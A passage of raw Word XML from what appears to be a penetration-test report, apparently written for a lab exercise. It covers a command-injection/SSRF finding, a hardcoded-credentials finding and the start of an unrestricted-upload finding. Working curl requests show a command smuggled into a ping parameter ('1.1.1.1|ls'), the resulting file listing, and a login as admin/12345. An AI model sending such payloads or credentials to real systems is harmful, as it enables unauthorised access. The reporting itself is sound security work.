      </w:r>
      <w:r w:rsidRPr="00572FAE">
        <w:t xml:space="preserve">. It can be triggered by executing the following request </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E9BAA3" w14:textId="6C8B84AB" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="001E41B3">
      <w:r>
        <w:t>Curl of the code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730D73FA" w14:textId="4E5B0CBF" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="001E41B3">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3670A480" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:r>
        <w:t>curl "http://13.41.78.176/ping" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6392FA" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:r>
        <w:t xml:space="preserve">  -H "Accept: text/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>html,application</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790A3771" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:r>
        <w:t xml:space="preserve">  -H "Accept-Language: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>en-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>US,en</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>;q</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=0.9" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FDD3DA" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:r>
        <w:t xml:space="preserve">  -H "Cache-Control: max-age=0" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB517F3" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:r>
        <w:t xml:space="preserve">  -H "Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6164C999" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:r>
        <w:t xml:space="preserve">  -H "Origin: http://13.41.78.176" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7296EA64" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:r>
        <w:t xml:space="preserve">  -H "Proxy-Connection: keep-alive" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AAE92E" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:r>
        <w:t xml:space="preserve">  -H "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: http://13.41.78.176/watcher" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C03E17" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:r>
        <w:t xml:space="preserve">  -H "Upgrade-Insecure-Requests: 1" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171AAA8F" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:r>
        <w:t xml:space="preserve">  -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750DFE3F" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:r>
        <w:t xml:space="preserve">  --data-raw "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=ping+-c+1+^%^221.1.1.1^%^7C+ls^%^22" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DFAFF9" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:r>
        <w:t xml:space="preserve">  --compressed ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33902878" w14:textId="046EAB51" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:r>
        <w:t xml:space="preserve">  --insecure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683903C9" w14:textId="41E89758" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74041191" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="001E41B3"/>
    <w:p w14:paraId="5B15E6EA" w14:textId="77777777" w:rsidR="001E41B3" w:rsidRDefault="001E41B3" w:rsidP="001E41B3"/>
    <w:p w14:paraId="54492B26" w14:textId="77777777" w:rsidR="001E41B3" w:rsidRDefault="001E41B3" w:rsidP="001E41B3">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="001E41B3">
        <w:t>he results show as below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEEF401" w14:textId="77777777" w:rsidR="001E41B3" w:rsidRDefault="001E41B3" w:rsidP="001E41B3"/>
    <w:p w14:paraId="7C6FFA86" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dockerfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6EEADD83" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:r>
        <w:t>LICENSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4340EE17" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>comments.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2CFAB9CE" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>configure.go</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="29B6D852" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66959C60" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:r>
        <w:t>file1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149CFFDF" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:r>
        <w:t>go.mod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6610BE30" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>go.sum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B5D2FC6" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:r>
        <w:t>handlers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FE8DD5" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:r>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3093E21F" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>main.go</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="34568C84" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>middlewares</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="775961D7" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:r>
        <w:t>static</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310D2202" w14:textId="3B0B76A8" w:rsidR="001E41B3" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:r>
        <w:t>uploads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BD6AD2" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE"/>
    <w:p w14:paraId="24BF77B3" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRPr="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00572FAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605FCA31" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRPr="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00572FAE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Implement strict input validation and filtering mechanisms to prevent arbitrary command execution or access to internal resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DCB488" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRPr="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00572FAE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Restrict access to sensitive functionalities and ensure proper authorization checks are in place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F06B37B" w14:textId="77777777" w:rsidR="00572FAE" w:rsidRPr="00572FAE" w:rsidRDefault="00572FAE" w:rsidP="00572FAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00572FAE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Regularly update and patch the server to mitigate known vulnerabilities that could be exploited via SSRF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E54746" w14:textId="77777777" w:rsidR="001E41B3" w:rsidRDefault="001E41B3" w:rsidP="001E41B3"/>
    <w:p w14:paraId="1CFD9B84" w14:textId="77777777" w:rsidR="001E41B3" w:rsidRDefault="001E41B3" w:rsidP="001E41B3"/>
    <w:p w14:paraId="03B3579D" w14:textId="3AE991A3" w:rsidR="00C71329" w:rsidRDefault="001E41B3" w:rsidP="00C71329">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc155811465"/>
      <w:r>
        <w:t xml:space="preserve">5.2 </w:t>
      </w:r>
      <w:r w:rsidR="00C71329" w:rsidRPr="00C71329">
        <w:t>Identification and Authentication Failure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="3DFC99ED" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t>Severity: High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA9EE71" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">CVSS 3.1 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Score</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>: 7.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A796B1" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">Scoring Vector: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>AV:N</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3ACCDD" w14:textId="5B7A58FC" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">This and the next are similar so I would show them </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>at</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> one place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F6ED31" w14:textId="2BCEE30F" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc155811466"/>
      <w:r>
        <w:t xml:space="preserve">5.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C71329">
        <w:t>Use of Hardcoded Credentials</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="21A5B9F0" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t>Severity: High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDAE535" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">CVSS 3.1 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Score</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>: 7.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E6EB01" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">Scoring Vector: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>AV:N</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A005C1" w14:textId="4EB24AE8" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329"/>
    <w:p w14:paraId="30725447" w14:textId="7C2AF851" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t>Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECBAFF5" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The application employs hardcoded credentials ("admin" with password "12345") for authentication, resulting in a critical identification and authentication failure. These credentials are stored within the codebase or configuration, providing unrestricted access to privileged functionalities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB5D8DD" w14:textId="35579A4F" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">Shown in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>followng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> curl -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D99FB64" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329"/>
    <w:p w14:paraId="6436EF63" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t>curl "http://13.41.78.176/authenticate" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8A9949" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  -H "Accept: text/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>html,application</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222743B6" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  -H "Accept-Language: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>en-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>US,en</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>;q</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=0.9" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575D6DD0" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  -H "Cache-Control: max-age=0" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364AB674" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  -H "Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B465D93" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  -H "Origin: http://13.41.78.176" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0580BDA7" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  -H "Proxy-Connection: keep-alive" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F85CDA" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  -H "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: http://13.41.78.176/admin" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710EDEF9" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  -H "Upgrade-Insecure-Requests: 1" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628CF71B" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F0C25D" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  --data-raw "username=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>admin&amp;password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=12345" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335D57C8" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  --compressed ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2B4621" w14:textId="1EFD6003" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  --insecure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BED94A" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329"/>
    <w:p w14:paraId="3A0438D9" w14:textId="44E36D18" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t>Resulting in - ```</w:t>
      </w:r>
      <w:r w:rsidRPr="00C71329">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C71329">
        <w:t xml:space="preserve">Successfully logged. Use this info for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C71329">
        <w:t>report.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E4D444" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329"/>
    <w:p w14:paraId="12943DD6" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329"/>
    <w:p w14:paraId="61811EE0" w14:textId="77777777" w:rsidR="00C71329" w:rsidRPr="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C71329">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318A60E0" w14:textId="77777777" w:rsidR="00C71329" w:rsidRPr="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C71329">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Immediate Remediation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C71329">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Remove hardcoded credentials from the application's codebase, configurations, or any other stored locations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B341A0" w14:textId="77777777" w:rsidR="00C71329" w:rsidRPr="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C71329">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Implement secure authentication mechanisms like password hashing, multifactor authentication, or token-based authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE95F36" w14:textId="77777777" w:rsidR="00C71329" w:rsidRPr="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C71329">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Utilize secure credential storage solutions (e.g., secret management tools) to manage authentication credentials securely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3122A95B" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329"/>
    <w:p w14:paraId="23A52C91" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329"/>
    <w:p w14:paraId="1039BFE8" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc155811467"/>
      <w:r>
        <w:t xml:space="preserve">5.4 </w:t>
      </w:r>
      <w:r>
        <w:t>Unrestricted File Upload</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="1283E9BF" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t>Severity: Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AAFC48" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">CVSS 3.1 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Score</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>: 9.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227B78D3" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">Scoring Vector: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>AV:N</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BDC4AE" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329"/>
    <w:p w14:paraId="0873D8B4" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t>Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7A6365" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t>The application's file upload functionality lacks proper validation controls, allowing unauthenticated users to upload files of any type and potentially execute malicious code on the server. This unrestricted file upload vulnerability enables attackers to abuse the system's resources, leading to severe data breaches, system compromise, and unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1CB5CB" w14:textId="4A76F7AD" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">There is a limit </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the size of the file.</w:t>
      </w:r>
    </w:p>
